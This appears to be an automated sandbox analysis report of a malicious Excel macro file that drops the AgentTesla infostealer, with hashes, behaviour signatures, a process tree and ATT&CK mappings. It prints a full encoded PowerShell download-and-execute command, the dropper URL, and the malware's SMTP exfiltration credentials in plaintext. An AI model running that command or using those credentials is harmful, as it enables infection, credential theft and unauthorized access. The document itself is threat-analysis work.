Analysis

  • max time kernel
    122s
  • max time network
    26s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    22-03-2021 14:14

General

  • Target

    MV TRIADES.xlsm

  • Size

    420KB

  • MD5

    f7f66672f19f2dabe4f7269e32eb8540

  • SHA1

    688ba6fb074142755fecd74056278b145a282f5a

  • SHA256

    9664740123170b912430759af6cfad9ff784ccd266fe93909022093beff051c7

  • SHA512

    b6a3f0df23c731b57ec21ed74bba187a46f49fb35c35a089417b17cc2dc1fed3b4dba04584b1ccb26df7fb7e29459a268c25d4d0df918b9eb0a319303aff360e

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://specfloors.net/dev/income.exe

Extracted

Family

agenttesla

Credentials

  • Protocol:
    smtp
  • Host:
    smtp.jiratane.com
  • Port:
    587
  • Username:
    mail@jiratane.com
  • Password:
    Olaola123@

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • AgentTesla Payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\MV TRIADES.xlsm"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1752
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1164
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1964
        • C:\Users\Admin\AppData\Roaming\tNDFx.exe
          "C:\Users\Admin\AppData\Roaming\tNDFx.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:992
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c timeout 1
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1080
            • C:\Windows\SysWOW64\timeout.exe
              timeout 1
              6⤵
              • Delays execution with timeout.exe
              PID:1944
          • C:\Users\Admin\AppData\Roaming\tNDFx.exe
            "C:\Users\Admin\AppData\Roaming\tNDFx.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:1696

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

2
T1112

Install Root Certificate

1
T1130

Credential Access

Credentials in Files

3
T1081

Discovery

System Information Discovery

2
T1082

Query Registry

1
T1012

Collection

Data from Local System

3
T1005

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\tNDFx.exe
    MD5

    b2ab5d8639c89d42acbdc362b86aca91

    SHA1

    84a55e89e1b5731a0dc1e8475e148b7c3ebb8b01

    SHA256

    7a8e27f4732de792d7904a347061efd90e892a954206adb676fe8b8a914ca3fa

    SHA512

    f7b0c0221812ef3cdee347125236eb7b430305bc904aba40ce49efc921664dd776d4b371649045ed31c062e7fc41391740b217fc3fc2c9f55b41168c6f94b630

  • C:\Users\Admin\AppData\Roaming\tNDFx.exe
    MD5

    b2ab5d8639c89d42acbdc362b86aca91

    SHA1

    84a55e89e1b5731a0dc1e8475e148b7c3ebb8b01

    SHA256

    7a8e27f4732de792d7904a347061efd90e892a954206adb676fe8b8a914ca3fa

    SHA512

    f7b0c0221812ef3cdee347125236eb7b430305bc904aba40ce49efc921664dd776d4b371649045ed31c062e7fc41391740b217fc3fc2c9f55b41168c6f94b630

  • C:\Users\Admin\AppData\Roaming\tNDFx.exe
    MD5

    b2ab5d8639c89d42acbdc362b86aca91

    SHA1

    84a55e89e1b5731a0dc1e8475e148b7c3ebb8b01

    SHA256

    7a8e27f4732de792d7904a347061efd90e892a954206adb676fe8b8a914ca3fa

    SHA512

    f7b0c0221812ef3cdee347125236eb7b430305bc904aba40ce49efc921664dd776d4b371649045ed31c062e7fc41391740b217fc3fc2c9f55b41168c6f94b630

  • \Users\Admin\AppData\Roaming\tNDFx.exe
    MD5

    b2ab5d8639c89d42acbdc362b86aca91

    SHA1

    84a55e89e1b5731a0dc1e8475e148b7c3ebb8b01

    SHA256

    7a8e27f4732de792d7904a347061efd90e892a954206adb676fe8b8a914ca3fa

    SHA512

    f7b0c0221812ef3cdee347125236eb7b430305bc904aba40ce49efc921664dd776d4b371649045ed31c062e7fc41391740b217fc3fc2c9f55b41168c6f94b630

  • memory/992-34-0x0000000000000000-mapping.dmp
  • memory/992-37-0x000000006BBA0000-0x000000006C28E000-memory.dmp
    Filesize

    6.9MB

  • memory/992-38-0x0000000000B50000-0x0000000000B51000-memory.dmp
    Filesize

    4KB

  • memory/992-40-0x0000000005CF0000-0x0000000005CF1000-memory.dmp
    Filesize

    4KB

  • memory/992-41-0x0000000000A60000-0x0000000000AA6000-memory.dmp
    Filesize

    280KB

  • memory/1080-42-0x0000000000000000-mapping.dmp
  • memory/1164-5-0x0000000000000000-mapping.dmp
  • memory/1696-50-0x00000000021D0000-0x00000000021D1000-memory.dmp
    Filesize

    4KB

  • memory/1696-44-0x0000000000400000-0x000000000043C000-memory.dmp
    Filesize

    240KB

  • memory/1696-45-0x000000000043766E-mapping.dmp
  • memory/1696-47-0x000000006BBA0000-0x000000006C28E000-memory.dmp
    Filesize

    6.9MB

  • memory/1696-48-0x0000000000400000-0x000000000043C000-memory.dmp
    Filesize

    240KB

  • memory/1696-51-0x00000000021D1000-0x00000000021D2000-memory.dmp
    Filesize

    4KB

  • memory/1752-2-0x000000002F371000-0x000000002F374000-memory.dmp
    Filesize

    12KB

  • memory/1752-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1752-3-0x0000000071011000-0x0000000071013000-memory.dmp
    Filesize

    8KB

  • memory/1944-43-0x0000000000000000-mapping.dmp
  • memory/1964-11-0x00000000049D0000-0x00000000049D1000-memory.dmp
    Filesize

    4KB

  • memory/1964-32-0x00000000062C0000-0x00000000062C1000-memory.dmp
    Filesize

    4KB

  • memory/1964-31-0x0000000006290000-0x0000000006291000-memory.dmp
    Filesize

    4KB

  • memory/1964-24-0x0000000006180000-0x0000000006181000-memory.dmp
    Filesize

    4KB

  • memory/1964-23-0x000000007EF30000-0x000000007EF31000-memory.dmp
    Filesize

    4KB

  • memory/1964-22-0x0000000005770000-0x0000000005771000-memory.dmp
    Filesize

    4KB

  • memory/1964-17-0x0000000005730000-0x0000000005731000-memory.dmp
    Filesize

    4KB

  • memory/1964-14-0x0000000004750000-0x0000000004751000-memory.dmp
    Filesize

    4KB

  • memory/1964-13-0x0000000002450000-0x0000000002451000-memory.dmp
    Filesize

    4KB

  • memory/1964-12-0x0000000004992000-0x0000000004993000-memory.dmp
    Filesize

    4KB

  • memory/1964-10-0x00000000009C0000-0x00000000009C1000-memory.dmp
    Filesize

    4KB

  • memory/1964-9-0x0000000004990000-0x0000000004991000-memory.dmp
    Filesize

    4KB

  • memory/1964-8-0x000000006BBA0000-0x000000006C28E000-memory.dmp
    Filesize

    6.9MB

  • memory/1964-7-0x0000000075EB1000-0x0000000075EB3000-memory.dmp
    Filesize

    8KB

  • memory/1964-6-0x0000000000000000-mapping.dmp